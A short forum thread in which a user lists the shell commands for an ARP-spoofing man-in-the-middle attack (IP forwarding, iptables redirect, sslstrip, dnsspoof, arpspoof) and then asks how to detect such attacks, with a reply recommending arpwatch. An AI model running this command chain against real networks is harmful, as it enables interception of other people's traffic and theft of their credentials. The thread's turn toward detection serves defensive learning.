man in the middle

[halfdone]

Hi

I just learn how to do a man in the middle attack with sslstrip i finally understood that using wired or wireless connection is not secure. Well I knew those danders with wlan, but I taught wired connection to be save.

Is this the "best" way to do this, or does I do something unneeded.

Code:

Shell
echo "1" > /proc/sys/net/ipv4/ip_forward

Shell
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Shell
sslstrip -a -l 8080
Shell
dnsspoof

Shell
arpspoof -i eth0 -t (target) (gateway)

Cause this arpspoofing etc. is so easy to do so how can I find out if someone is doing this. Like if I'm in public WLAN. Yes, I sslstrip creates that fake certificate, but just messenger etc.

Well I can use wireshark and look if there is anything strange in ARP. is there a easier way to do it?

[M1ck3y]

You can use this: Arpwatch.

arpwatch monitors mac adresses on your network and writes them into a file.
last know timestamp and change notification is included. use it to monitor for unknown (and as such, likely to be intruder's) mac adresses or somebody messing around with your arp_/dns_tables.